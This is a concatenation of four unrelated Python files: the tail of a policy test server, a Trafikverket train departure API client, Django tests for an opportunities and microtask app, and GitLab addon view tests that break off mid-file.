    return [ f[len_base_name:f.rfind('.')] for f in files ]
def ReadPolicyFromDataDir(self, policy_selector, proto_message):
"""Tries to read policy payload from a file in the data directory.
First checks for a binary rendition of the policy protobuf in
<data_dir>/policy_<sanitized_policy_selector>.bin. If that exists, returns
it. If that file doesn't exist, tries
<data_dir>/policy_<sanitized_policy_selector>.txt and decodes that as a
protobuf using proto_message. If that fails as well, returns None.
Args:
policy_selector: Selects which policy to read.
proto_message: Optional protobuf message object used for decoding the
proto text format.
Returns:
The binary payload message, or None if not found.
"""
base_filename = self.GetBaseFilename(policy_selector)
# Try the binary payload file first.
try:
return open(base_filename + '.bin').read()
except IOError:
pass
# If that fails, try the text version instead.
if proto_message is None:
return None
try:
text = open(base_filename + '.txt').read()
google.protobuf.text_format.Merge(text, proto_message)
return proto_message.SerializeToString()
except IOError:
return None
except google.protobuf.text_format.ParseError:
return None
def ReadPolicyDataFromDataDir(self, policy_selector):
"""Returns the external policy data for |policy_selector| if found.
Args:
policy_selector: Selects which policy to read.
Returns:
The data for the corresponding policy type and entity id, if found.
"""
base_filename = self.GetBaseFilename(policy_selector)
try:
return open(base_filename + '.data').read()
except IOError:
return None
def GetBaseURL(self):
"""Returns the server base URL.
Respects the |server_base_url| configuration parameter, if present. Falls
back to construct the URL from the server hostname and port otherwise.
Returns:
The URL to use for constructing URLs that get returned to clients.
"""
base_url = self.server_base_url
if base_url is None:
base_url = 'http://%s:%s' % self.server_address[:2]
return base_url
class PolicyServerRunner(testserver_base.TestServerRunner):
def __init__(self):
super(PolicyServerRunner, self).__init__()
def create_server(self, server_data):
data_dir = self.options.data_dir or ''
config_file = (self.options.config_file or
os.path.join(data_dir, 'device_management'))
server = PolicyTestServer((self.options.host, self.options.port),
data_dir, config_file,
self.options.client_state_file,
self.options.policy_keys,
self.options.server_base_url)
server_data['port'] = server.server_port
return server
def add_options(self):
testserver_base.TestServerRunner.add_options(self)
self.option_parser.add_option('--client-state', dest='client_state_file',
help='File that client state should be '
'persisted to. This allows the server to be '
'seeded by a list of pre-registered clients '
'and restarts without abandoning registered '
'clients.')
self.option_parser.add_option('--policy-key', action='append',
dest='policy_keys',
help='Specify a path to a PEM-encoded '
'private key to use for policy signing. May '
'be specified multiple times in order to '
'load multiple keys into the server. If the '
'server has multiple keys, it will rotate '
                                  'through them at each request in a '
'round-robin fashion. The server will '
'use a canned key if none is specified '
'on the command line. The test server will '
'also look for a verification signature file '
'in the same location: <filename>.sig and if '
'present will add the signature to the '
'policy blob as appropriate via the '
'new_public_key_verification_signature '
'field.')
self.option_parser.add_option('--log-level', dest='log_level',
default='WARN',
help='Log level threshold to use.')
self.option_parser.add_option('--config-file', dest='config_file',
help='Specify a configuration file to use '
'instead of the default '
'<data_dir>/device_management')
self.option_parser.add_option('--server-base-url', dest='server_base_url',
help='The server base URL to use when '
'constructing URLs to return to the client.')
def run_server(self):
logger = logging.getLogger()
logger.setLevel(getattr(logging, str(self.options.log_level).upper()))
if (self.options.log_to_console):
logger.addHandler(logging.StreamHandler())
if (self.options.log_file):
logger.addHandler(logging.FileHandler(self.options.log_file))
testserver_base.TestServerRunner.run_server(self)
if __name__ == '__main__':
sys.exit(PolicyServerRunner().main())
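# A minimal invocation sketch (assuming testserver_base supplies the
# --port/--data-dir options that self.options references above; the paths
# are placeholders):
#
#   python policy_testserver.py --port 8889 --data-dir /tmp/policy_data \
#       --config-file /tmp/policy_data/device_management --log-level DEBUG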
|
|
"""Enables retreival of train departure information from Trafikverket API."""
import typing
from datetime import datetime, timedelta
from enum import Enum
import aiohttp
from pytrafikverket.trafikverket import (
FieldFilter, FieldSort, FilterOperation, NodeHelper, OrFilter, SortOrder,
Trafikverket)
class StationInfo(object):
"""Contains information about a train station."""
_required_fields = ["LocationSignature", "AdvertisedLocationName"]
def __init__(self, signature: str, name: str, advertised: str):
"""Initialize StationInfo class."""
self.signature = signature
self.name = name
self.advertised = advertised
@classmethod
def from_xml_node(cls, node):
"""Map station information in XML data."""
node_helper = NodeHelper(node)
location_signature = node_helper.get_text("LocationSignature")
advertised_location_name = \
node_helper.get_text("AdvertisedLocationName")
location_advertised = node_helper.get_text("Advertised")
return cls(location_signature,
advertised_location_name,
location_advertised)
class TrainStopStatus(Enum):
"""Contain the different train stop statuses."""
on_time = "scheduled to arrive on schedule"
delayed = "delayed"
canceled = "canceled"
class TrainStop(object):
"""Contain information about a train stop."""
_required_fields = ["ActivityId", "Canceled", "AdvertisedTimeAtLocation",
"EstimatedTimeAtLocation", "TimeAtLocation",
"OtherInformation", "Deviation", "ModifiedTime"]
def __init__(self, id, canceled: bool,
advertised_time_at_location: datetime,
estimated_time_at_location: datetime,
time_at_location: datetime,
other_information: typing.List[str],
deviations: typing.List[str],
modified_time: datetime):
"""Initialize TrainStop."""
self.id = id
self.canceled = canceled
self.advertised_time_at_location = advertised_time_at_location
self.estimated_time_at_location = estimated_time_at_location
self.time_at_location = time_at_location
self.other_information = other_information
self.deviations = deviations
self.modified_time = modified_time
def get_state(self) -> TrainStopStatus:
"""Retrieve the state of the departure."""
if self.canceled:
return TrainStopStatus.canceled
if (self.advertised_time_at_location is not None and
self.time_at_location is not None and
self.advertised_time_at_location != self.time_at_location):
return TrainStopStatus.delayed
if (self.advertised_time_at_location is not None and
self.estimated_time_at_location is not None and
self.advertised_time_at_location !=
self.estimated_time_at_location):
return TrainStopStatus.delayed
return TrainStopStatus.on_time
def get_delay_time(self) -> timedelta:
"""Calculate the delay of a departure."""
if self.canceled:
return None
if (self.advertised_time_at_location is not None and
self.time_at_location is not None and
self.advertised_time_at_location != self.time_at_location):
return self.time_at_location - self.advertised_time_at_location
if (self.advertised_time_at_location is not None and
self.estimated_time_at_location is not None and
self.advertised_time_at_location !=
self.estimated_time_at_location):
return self.estimated_time_at_location - \
self.advertised_time_at_location
return None
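    # For example, a stop advertised at 10:00 that actually occurred at
    # 10:05 yields timedelta(minutes=5); a canceled stop yields None.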
@classmethod
def from_xml_node(cls, node):
"""Map the path in the return XML data."""
node_helper = NodeHelper(node)
activity_id = node_helper.get_text("ActivityId")
canceled = node_helper.get_bool("Canceled")
advertised_time_at_location = node_helper.get_datetime(
"AdvertisedTimeAtLocation")
estimated_time_at_location = node_helper.get_datetime(
"EstimatedTimeAtLocation")
time_at_location = node_helper.get_datetime("TimeAtLocation")
other_information = node_helper.get_texts("OtherInformation")
deviations = node_helper.get_texts("Deviation")
modified_time = node_helper.get_datetime_for_modified("ModifiedTime")
return cls(activity_id, canceled, advertised_time_at_location,
estimated_time_at_location, time_at_location,
other_information, deviations, modified_time)
class TrafikverketTrain(object):
"""Class used to communicate with trafikverket's train api."""
def __init__(self, client_session: aiohttp.ClientSession, api_key: str):
"""Initialize TrainInfo object."""
self._api = Trafikverket(client_session, api_key)
async def async_get_train_station(self, location_name: str) -> StationInfo:
"""Retreive train station id based on name."""
train_stations = await self._api.async_make_request(
"TrainStation",
StationInfo._required_fields,
[FieldFilter(FilterOperation.equal,
"AdvertisedLocationName", location_name),
FieldFilter(FilterOperation.equal, "Advertised", "true")])
if len(train_stations) == 0:
raise ValueError(
"Could not find a station with the specified name")
if len(train_stations) > 1:
raise ValueError(
"Found multiple stations with the specified name")
return StationInfo.from_xml_node(train_stations[0])
async def async_search_train_stations(
self, location_name: str) -> typing.List[StationInfo]:
"""Search for train stations."""
train_stations = await self._api.async_make_request(
"TrainStation",
["AdvertisedLocationName", "LocationSignature",
"Advertised", "Deleted"],
[FieldFilter(FilterOperation.like,
"AdvertisedLocationName", location_name),
FieldFilter(FilterOperation.equal, "Advertised", "true")])
if len(train_stations) == 0:
raise ValueError(
"Could not find a station with the specified name")
        result = []
for train_station in train_stations:
result.append(StationInfo.from_xml_node(train_station))
return result
async def async_get_train_stop(
self, from_station: StationInfo,
to_station: StationInfo, time_at_location: datetime) -> TrainStop:
"""Retrieve the train stop."""
date_as_text = time_at_location.strftime(Trafikverket.date_time_format)
filters = [FieldFilter(FilterOperation.equal,
"ActivityType", "Avgang"),
FieldFilter(FilterOperation.equal,
"LocationSignature",
from_station.signature),
FieldFilter(FilterOperation.equal,
"AdvertisedTimeAtLocation",
date_as_text),
OrFilter([FieldFilter(FilterOperation.equal,
"ViaToLocation.LocationName",
to_station.signature),
FieldFilter(FilterOperation.equal,
"ToLocation.LocationName",
to_station.signature)])]
train_announcements = await self._api.async_make_request(
"TrainAnnouncement", TrainStop._required_fields, filters)
if len(train_announcements) == 0:
raise ValueError("No TrainAnnouncement found")
if len(train_announcements) > 1:
raise ValueError("Multiple TrainAnnouncements found")
train_announcement = train_announcements[0]
return TrainStop.from_xml_node(train_announcement)
async def async_get_next_train_stop(
self, from_station: StationInfo,
to_station: StationInfo,
after_time: datetime) -> TrainStop:
"""Enable retreival of next departure."""
date_as_text = after_time.strftime(Trafikverket.date_time_format)
filters = [FieldFilter(FilterOperation.equal,
"ActivityType",
"Avgang"),
FieldFilter(FilterOperation.equal,
"LocationSignature",
from_station.signature),
FieldFilter(FilterOperation.greater_than_equal,
"AdvertisedTimeAtLocation",
date_as_text),
OrFilter([FieldFilter(FilterOperation.equal,
"ViaToLocation.LocationName",
to_station.signature),
FieldFilter(FilterOperation.equal,
"ToLocation.LocationName",
to_station.signature)])]
sorting = [FieldSort("AdvertisedTimeAtLocation", SortOrder.ascending)]
train_announcements = await self._api.async_make_request(
"TrainAnnouncement",
TrainStop._required_fields,
filters,
1,
sorting)
if len(train_announcements) == 0:
raise ValueError("No TrainAnnouncement found")
if len(train_announcements) > 1:
raise ValueError("Multiple TrainAnnouncements found")
train_announcement = train_announcements[0]
return TrainStop.from_xml_node(train_announcement)
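# A minimal usage sketch (station names and API_KEY are placeholders; assumes
# a valid Trafikverket API key):
#
#   import asyncio
#   from datetime import datetime
#
#   async def main():
#       async with aiohttp.ClientSession() as session:
#           train_api = TrafikverketTrain(session, API_KEY)
#           from_station = await train_api.async_get_train_station("Stockholm C")
#           to_station = await train_api.async_get_train_station("Uppsala C")
#           stop = await train_api.async_get_next_train_stop(
#               from_station, to_station, datetime.now())
#           print(stop.get_state(), stop.get_delay_time())
#
#   asyncio.get_event_loop().run_until_complete(main())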
|
|
from django.contrib.auth.models import User
from ummeli.vlive.tests.utils import VLiveClient, VLiveTestCase
from ummeli.opportunities.models import *
from django.core.urlresolvers import reverse
from datetime import datetime, timedelta
from django.contrib.sites.models import Site
class OpportunitiesTest(VLiveTestCase):
fixtures = [
'vlive/tests/auth/fixtures/sample.json',
'fixtures/opportunities.provinces.json',
'opportunities/fixtures/test.opportunities.json',
]
def setUp(self):
self.msisdn = '27123456789'
self.pin = '1234'
self.client = VLiveClient(HTTP_X_UP_CALLING_LINE_ID=self.msisdn)
def test_province_from_str(self):
p = Province.from_str('Gauteng')
self.assertEqual(p.get_province_display(), 'Gauteng')
p = Province.from_str('KwaZulu Natal')
self.assertEqual(p.get_province_display(), 'KwaZulu Natal')
p = Province.from_str('Kwa-Zulu Natal')
self.assertEqual(p.get_province_display(), 'KwaZulu Natal')
p = Province.from_str('Western Cape')
self.assertEqual(p.get_province_display(), 'Western Cape')
def test_internship(self):
self.login()
self.fill_in_basic_info()
user = User.objects.get(username=self.msisdn)
salary = Salary(amount=50, frequency=1)
salary.save()
i = Internship.objects.create(title='Test op',
description='This is a test',
owner=user,
salary=salary,
state='published')
i.province.add(2)
i.province.add(3)
i.save()
self.assertEqual(user.modelbase_set.filter(slug=i.slug).count(), 1)
self.assertEqual(user.modelbase_set.all()[0].ummeliopportunity.internship.salary.amount, 50)
self.assertEqual(user.modelbase_set.all()[0].ummeliopportunity.internship.education, 0)
self.assertEqual(user.modelbase_set.all()[0].ummeliopportunity.internship.province.count(), 2)
resp = self.client.get(reverse('internships'))
self.assertContains(resp, 'Test op')
resp = self.client.get(reverse('internship_detail', kwargs={'slug': 'test-op'}))
self.assertContains(resp, 'Test op')
self.assertContains(resp, 'This is a test')
def test_training(self):
self.login()
self.fill_in_basic_info()
user = User.objects.get(username=self.msisdn)
i = Training.objects.create(title='Test op',
description='This is a test',
owner=user,
cost=300)
self.assertEqual(user.modelbase_set.filter(slug=i.slug).count(), 1)
self.assertEqual(user.modelbase_set.all()[0].ummeliopportunity.training.cost, 300)
def test_event(self):
self.login()
self.fill_in_basic_info()
user = User.objects.get(username=self.msisdn)
i = Event.objects.create(title='Test op',
description='This is a test',
owner=user,
place='Salt River')
self.assertEqual(user.modelbase_set.filter(slug=i.slug).count(), 1)
self.assertEqual(user.modelbase_set.all()[0].event.place, 'Salt River')
def test_change_province_session(self):
self.login()
self.fill_in_basic_info()
user = User.objects.get(username=self.msisdn)
province = Province.objects.get(province=3)
i = Event.objects.create(title='Test op',
description='This is a test',
owner=user,
place='Salt River',
state='published')
i.province.add(province)
i.save()
self.assertEqual(user.modelbase_set.filter(slug=i.slug).count(), 1)
self.assertEqual(user.modelbase_set.all()[0].event.place, 'Salt River')
resp = self.client.get(reverse('events'))
self.assertContains(resp, 'All Provinces (change)')
self.assertContains(resp, 'Location: Salt River')
resp = self.client.get(reverse('change_province'))
self.assertEqual(resp.status_code, 200)
url = '%s?next=/vlive/opportunities/events/' %\
reverse('change_province', kwargs={'province': 1})
resp = self.client.get(url)
self.assertVLiveRedirects(resp, reverse('events'))
resp = self.client.get(reverse('events'))
self.assertContains(resp, 'Eastern Cape (change)')
self.assertContains(resp, '0 events')
url = '%s?next=/vlive/opportunities/events/' %\
reverse('change_province', kwargs={'province': 3})
resp = self.client.get(url)
self.assertVLiveRedirects(resp, reverse('events'))
resp = self.client.get(reverse('events'))
self.assertContains(resp, 'Gauteng (change)')
self.assertContains(resp, 'Location: Salt River')
def test_task_checkout(self):
web_site = Site.objects.get_current()
c = Campaign.objects.create(title='Campaign1')
t1 = MicroTask(title='Test1', state='published', campaign=c)
t1.save()
t1.sites.add(web_site)
t2 = MicroTask(title='Test2', users_per_task=0, state='published',
campaign=c)
t2.save()
t2.sites.add(web_site)
t3 = MicroTask(title='Test3', users_per_task=2, state='published',
campaign=c)
t3.save()
t3.sites.add(web_site)
t4 = MicroTask(title='Test4', users_per_task=2, state='published',
campaign=c)
t4.save()
t4.sites.add(web_site)
self.assertEqual(MicroTask.permitted.all().count(), 4)
self.assertEqual(MicroTask.available.all().count(), 4)
user = User.objects.get(username=self.msisdn)
user2 = User.objects.get(username='27121111111')
#simple case - 1 user per task
self.assertTrue(t1.is_available())
result = t1.checkout(user)
self.assertTrue(result)
self.assertFalse(t1.is_available())
self.assertEqual(MicroTask.available.all().count(), 3)
tc = TaskCheckout.objects.get(user=user)
self.assertEqual(tc.task, t1)
#infinite checkouts available
self.assertTrue(t2.is_available())
result = t2.checkout(user)
self.assertTrue(result)
self.assertTrue(t2.is_available())
self.assertEqual(MicroTask.available.all().count(), 3)
#custom - 2 users per task
self.assertTrue(t3.is_available())
result = t3.checkout(user)
self.assertTrue(result)
self.assertTrue(t3.is_available())
result = t3.checkout(user2)
self.assertTrue(result)
self.assertFalse(t3.is_available())
self.assertEqual(MicroTask.available.all().count(), 2)
#negative case - user attempt to checkout a task twice
self.assertTrue(t4.is_available())
result = t4.checkout(user)
self.assertTrue(result)
self.assertTrue(t4.is_available())
result = t4.checkout(user)
self.assertFalse(result)
self.assertTrue(t4.is_available())
#test microtask response object
checkout = TaskCheckout.objects.get(task=t1)
task_response = TomTomMicroTaskResponse.objects.create(
task_checkout=checkout,
user=user,
state=SUBMITTED,
task=t1)
self.assertIsNotNone(checkout.microtaskresponse)
self.assertIsNotNone(checkout.microtaskresponse.tomtommicrotaskresponse)
def test_task_expiration(self):
user = User.objects.get(username=self.msisdn)
web_site = Site.objects.get_current()
c = Campaign.objects.create(title='Campaign1')
t1 = MicroTask(title='task1', state='published', campaign=c)
t1.save()
t1.sites.add(web_site)
t2 = MicroTask(title='task2', state='published', campaign=c)
t2.save()
t2.sites.add(web_site)
c.tasks.add(t1)
c.tasks.add(t2)
self.assertTrue(t1.is_available())
d1 = datetime.now() - timedelta(hours=16)
t1.checkout(user)
t_checkout = t1.taskcheckout_set.all()[0]
t_checkout.date = d1
t_checkout.save()
MicroTask.expire_tasks()
self.assertFalse(t1.is_available())
self.assertTrue(t2.is_available())
d1 = datetime.now() - timedelta(hours=25)
t2.checkout(user)
t_checkout = t2.taskcheckout_set.all()[0]
t_checkout.date = d1
t_checkout.save()
MicroTask.expire_tasks()
self.assertTrue(t2.is_available())
self.assertEqual(Campaign.available_tasks().count(), 1)
|
|
# -*- coding: utf-8 -*-
from rest_framework import status as http_status
import mock
import datetime
import pytest
import unittest
from json import dumps
from nose.tools import * # noqa (PEP8 asserts)
from tests.base import OsfTestCase, get_default_metaschema
from osf_tests.factories import ProjectFactory, UserFactory, AuthUserFactory
from github3.repos.branch import Branch
from framework.exceptions import HTTPError
from framework.auth import Auth
from addons.base.tests.views import (
OAuthAddonAuthViewsTestCaseMixin, OAuthAddonConfigViewsTestCaseMixin
)
from addons.gitlab import utils
from addons.gitlab.api import GitLabClient
from addons.gitlab.serializer import GitLabSerializer
from addons.gitlab.utils import check_permissions
from addons.gitlab.tests.utils import create_mock_gitlab, GitLabAddonTestCase
from addons.gitlab.tests.factories import GitLabAccountFactory
pytestmark = pytest.mark.django_db
class TestGitLabAuthViews(GitLabAddonTestCase, OAuthAddonAuthViewsTestCaseMixin, OsfTestCase):
@mock.patch(
'addons.gitlab.models.UserSettings.revoke_remote_oauth_access',
mock.PropertyMock()
)
def test_delete_external_account(self):
super(TestGitLabAuthViews, self).test_delete_external_account()
def test_oauth_start(self):
pass
def test_oauth_finish(self):
pass
class TestGitLabConfigViews(GitLabAddonTestCase, OAuthAddonConfigViewsTestCaseMixin, OsfTestCase):
folder = None
Serializer = GitLabSerializer
client = GitLabClient
## Overrides ##
def setUp(self):
super(TestGitLabConfigViews, self).setUp()
self.mock_api_user = mock.patch('addons.gitlab.api.GitLabClient.user')
self.mock_api_user.return_value = mock.Mock()
self.mock_api_user.start()
def tearDown(self):
self.mock_api_user.stop()
super(TestGitLabConfigViews, self).tearDown()
def test_folder_list(self):
        # GitLab only lists the root folder (repos), so this test is superfluous
pass
@mock.patch('addons.gitlab.models.NodeSettings.add_hook')
@mock.patch('addons.gitlab.views.GitLabClient.repo')
def test_set_config(self, mock_repo, mock_add_hook):
        # GitLab selects repos, not folders, so this needs to be overridden
mock_repo.return_value = 'repo_name'
url = self.project.api_url_for('{0}_set_config'.format(self.ADDON_SHORT_NAME))
res = self.app.post_json(url, {
'gitlab_user': 'octocat',
'gitlab_repo': 'repo_name',
'gitlab_repo_id': '123',
}, auth=self.user.auth)
assert_equal(res.status_code, http_status.HTTP_200_OK)
self.project.reload()
assert_equal(
self.project.logs.latest().action,
'{0}_repo_linked'.format(self.ADDON_SHORT_NAME)
)
mock_add_hook.assert_called_once_with(save=False)
# TODO: Test remaining CRUD methods
# TODO: Test exception handling
class TestCRUD(OsfTestCase):
def setUp(self):
super(TestCRUD, self).setUp()
self.gitlab = create_mock_gitlab(user='fred', private=False)
self.user = AuthUserFactory()
self.consolidated_auth = Auth(user=self.user)
self.project = ProjectFactory(creator=self.user)
self.project.add_addon('gitlab', auth=self.consolidated_auth)
self.project.creator.add_addon('gitlab')
self.node_settings = self.project.get_addon('gitlab')
self.node_settings.user_settings = self.project.creator.get_addon('gitlab')
# Set the node addon settings to correspond to the values of the mock repo
self.node_settings.user = self.gitlab.repo.return_value.owner.login
self.node_settings.repo = self.gitlab.repo.return_value.name
self.node_settings.save()
class TestGitLabViews(OsfTestCase):
def setUp(self):
super(TestGitLabViews, self).setUp()
self.user = AuthUserFactory()
self.consolidated_auth = Auth(user=self.user)
self.project = ProjectFactory(creator=self.user)
self.non_authenticator = UserFactory()
self.project.add_contributor(
contributor=self.non_authenticator,
auth=self.consolidated_auth,
)
self.project.save()
self.project.add_addon('gitlab', auth=self.consolidated_auth)
self.project.creator.add_addon('gitlab')
self.project.creator.external_accounts.add(GitLabAccountFactory())
self.project.creator.save()
self.gitlab = create_mock_gitlab(user='fred', private=False)
self.node_settings = self.project.get_addon('gitlab')
self.node_settings.user_settings = self.project.creator.get_addon('gitlab')
# Set the node addon settings to correspond to the values of the mock repo
self.node_settings.user = 'fred'
self.node_settings.repo = 'mock-repo'
self.node_settings.repo_id = 1748448
self.node_settings.save()
def _get_sha_for_branch(self, branch=None, mock_branches=None):
gitlab_mock = self.gitlab
if mock_branches is None:
mock_branches = gitlab_mock.branches
if branch is None: # Get default branch name
branch = self.gitlab.repo.default_branch
for each in mock_branches:
if each.name == branch:
branch_sha = each.commit['id']
return branch_sha
# Tests for _get_refs
@mock.patch('addons.gitlab.api.GitLabClient.branches')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_get_refs_defaults(self, mock_repo, mock_branches):
gitlab_mock = self.gitlab
mock_repo.return_value = gitlab_mock.repo
mock_branches.return_value = gitlab_mock.branches.return_value
branch, sha, branches = utils.get_refs(self.node_settings)
assert_equal(
branch,
gitlab_mock.repo.default_branch
)
assert_equal(sha, branches[0].commit['id']) # Get refs for default branch
assert_equal(
branches,
gitlab_mock.branches.return_value
)
@mock.patch('addons.gitlab.api.GitLabClient.branches')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_get_refs_branch(self, mock_repo, mock_branches):
gitlab_mock = self.gitlab
mock_repo.return_value = gitlab_mock.repo.return_value
mock_branches.return_value = gitlab_mock.branches.return_value
branch, sha, branches = utils.get_refs(self.node_settings, 'master')
assert_equal(branch, 'master')
assert_equal(sha, branches[0].commit['id'])
assert_equal(
branches,
gitlab_mock.branches.return_value
)
def test_before_fork(self):
url = self.project.api_url + 'fork/before/'
res = self.app.get(url, auth=self.user.auth).maybe_follow()
assert_equal(len(res.json['prompts']), 1)
@mock.patch('addons.gitlab.models.UserSettings.has_auth')
def test_before_register(self, mock_has_auth):
mock_has_auth.return_value = True
url = self.project.api_url + 'beforeregister/'
res = self.app.get(url, auth=self.user.auth).maybe_follow()
assert_true('GitLab' in res.json['prompts'][1])
def test_get_refs_sha_no_branch(self):
with assert_raises(HTTPError):
utils.get_refs(self.node_settings, sha='12345')
# Tests for _check_permissions
# make a user with no authorization; make sure check_permissions returns false
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_permissions_no_auth(self, mock_repo):
gitlab_mock = self.gitlab
# project is set to private right now
mock_repository = mock.Mock(**{
'user': 'fred',
'repo': 'mock-repo',
'permissions': {
'project_access': {'access_level': 20, 'notification_level': 3}
},
})
mock_repo.attributes.return_value = mock_repository
connection = gitlab_mock
non_authenticated_user = UserFactory()
non_authenticated_auth = Auth(user=non_authenticated_user)
branch = 'master'
assert_false(check_permissions(self.node_settings, non_authenticated_auth, connection, branch, repo=mock_repository))
# make a repository that doesn't allow push access for this user;
# make sure check_permissions returns false
@mock.patch('addons.gitlab.models.UserSettings.has_auth')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_permissions_no_access(self, mock_repo, mock_has_auth):
gitlab_mock = self.gitlab
mock_has_auth.return_value = True
connection = gitlab_mock
branch = 'master'
mock_repository = mock.Mock(**{
'user': 'fred',
'repo': 'mock-repo',
'permissions': {
'project_access': {'access_level': 20, 'notification_level': 3}
},
})
mock_repo.attributes.return_value = mock_repository
assert_false(check_permissions(self.node_settings, self.consolidated_auth, connection, branch, repo=mock_repository))
# make a branch with a different commit than the commit being passed into check_permissions
@mock.patch('addons.gitlab.models.UserSettings.has_auth')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_permissions_not_head(self, mock_repo, mock_has_auth):
gitlab_mock = self.gitlab
mock_has_auth.return_value = True
connection = gitlab_mock
mock_branch = mock.Mock(**{
'commit': {'id': '67890'}
})
mock_repository = mock.Mock(**{
'user': 'fred',
'repo': 'mock-repo',
'permissions': {
'project_access': {'access_level': 20, 'notification_level': 3}
},
})
mock_repo.attributes.return_value = mock_repository
connection.branches.return_value = mock_branch
sha = '12345'
assert_false(check_permissions(self.node_settings, self.consolidated_auth, connection, mock_branch, sha=sha, repo=mock_repository))
# make sure permissions are not granted for editing a registration
@mock.patch('addons.gitlab.models.UserSettings.has_auth')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_permissions(self, mock_repo, mock_has_auth):
gitlab_mock = self.gitlab
mock_has_auth.return_value = True
connection = gitlab_mock
mock_repository = mock.Mock(**{
'user': 'fred',
'repo': 'mock-repo',
'permissions': {
'project_access': {'access_level': 20, 'notification_level': 3}
},
})
mock_repo.attributes.return_value = mock_repository
with mock.patch('osf.models.node.AbstractNode.is_registration', new_callable=mock.PropertyMock) as mock_is_reg:
mock_is_reg.return_value = True
assert_false(check_permissions(self.node_settings, self.consolidated_auth, connection, 'master', repo=mock_repository))
def check_hook_urls(self, urls, node, path, sha):
url = node.web_url_for('addon_view_or_download_file', path=path, provider='gitlab')
expected_urls = {
'view': '{0}?branch={1}'.format(url, sha),
'download': '{0}?action=download&branch={1}'.format(url, sha)
}
assert_equal(urls['view'], expected_urls['view'])
assert_equal(urls['download'], expected_urls['download'])
@mock.patch('addons.gitlab.views.verify_hook_signature')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_hook_callback_add_file_not_thro_osf(self, mock_repo, mock_verify):
gitlab_mock = self.gitlab
gitlab_mock.repo = mock_repo
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
timestamp = str(datetime.datetime.utcnow())
self.app.post_json(
url,
{
'test': True,
'commits': [{
'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': 'foo',
'timestamp': timestamp,
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io', 'username': 'tester'},
'added': ['PRJWN3TV'],
'removed': [],
'modified': [],
}]
},
content_type='application/json',
).maybe_follow()
self.project.reload()
assert_equal(self.project.logs.latest().action, 'gitlab_file_added')
urls = self.project.logs.latest().params['urls']
self.check_hook_urls(
urls,
self.project,
path='PRJWN3TV',
sha='b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
)
@mock.patch('addons.gitlab.views.verify_hook_signature')
def test_hook_callback_modify_file_not_thro_osf(self, mock_verify):
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
timestamp = str(datetime.datetime.utcnow())
self.app.post_json(
url,
{'test': True,
'commits': [{'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': ' foo',
'timestamp': timestamp,
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io',
'username': 'tester'},
'added': [], 'removed':[], 'modified':['PRJWN3TV']}]},
content_type='application/json').maybe_follow()
self.project.reload()
assert_equal(self.project.logs.latest().action, 'gitlab_file_updated')
urls = self.project.logs.latest().params['urls']
self.check_hook_urls(
urls,
self.project,
path='PRJWN3TV',
sha='b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
)
@mock.patch('addons.gitlab.views.verify_hook_signature')
def test_hook_callback_remove_file_not_thro_osf(self, mock_verify):
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
timestamp = str(datetime.datetime.utcnow())
self.app.post_json(
url,
{'test': True,
'commits': [{'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': 'foo',
'timestamp': timestamp,
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io', 'username': 'tester'},
'added': [], 'removed': ['PRJWN3TV'], 'modified':[]}]},
content_type='application/json').maybe_follow()
self.project.reload()
assert_equal(self.project.logs.latest().action, 'gitlab_file_removed')
urls = self.project.logs.latest().params['urls']
assert_equal(urls, {})
@mock.patch('addons.gitlab.views.verify_hook_signature')
def test_hook_callback_add_file_thro_osf(self, mock_verify):
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
self.app.post_json(
url,
{'test': True,
'commits': [{'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': 'Added via the Open Science Framework',
'timestamp': '2014-01-08T14:15:51-08:00',
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io', 'username': 'tester'},
'added': ['PRJWN3TV'], 'removed':[], 'modified':[]}]},
content_type='application/json').maybe_follow()
self.project.reload()
assert_not_equal(self.project.logs.latest().action, 'gitlab_file_added')
@mock.patch('addons.gitlab.views.verify_hook_signature')
def test_hook_callback_modify_file_thro_osf(self, mock_verify):
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
self.app.post_json(
url,
{'test': True,
'commits': [{'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': 'Updated via the Open Science Framework',
'timestamp': '2014-01-08T14:15:51-08:00',
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io', 'username': 'tester'},
'added': [], 'removed':[], 'modified':['PRJWN3TV']}]},
content_type='application/json').maybe_follow()
self.project.reload()
assert_not_equal(self.project.logs.latest().action, 'gitlab_file_updated')
@mock.patch('addons.gitlab.views.verify_hook_signature')
